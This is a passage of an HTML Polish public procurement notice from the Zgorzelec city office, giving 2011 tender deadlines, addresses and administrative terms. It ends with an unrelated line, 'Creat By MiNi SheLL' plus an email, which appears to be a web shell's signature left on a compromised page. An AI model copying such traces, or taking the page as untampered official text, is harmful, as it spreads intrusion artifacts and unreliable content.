      zmian  w umowie aneksem, w  terminie 7 dni od daty zaistniałej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
               59-900 Zgorzelec 
               ul.  Domańskiego 7
               Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com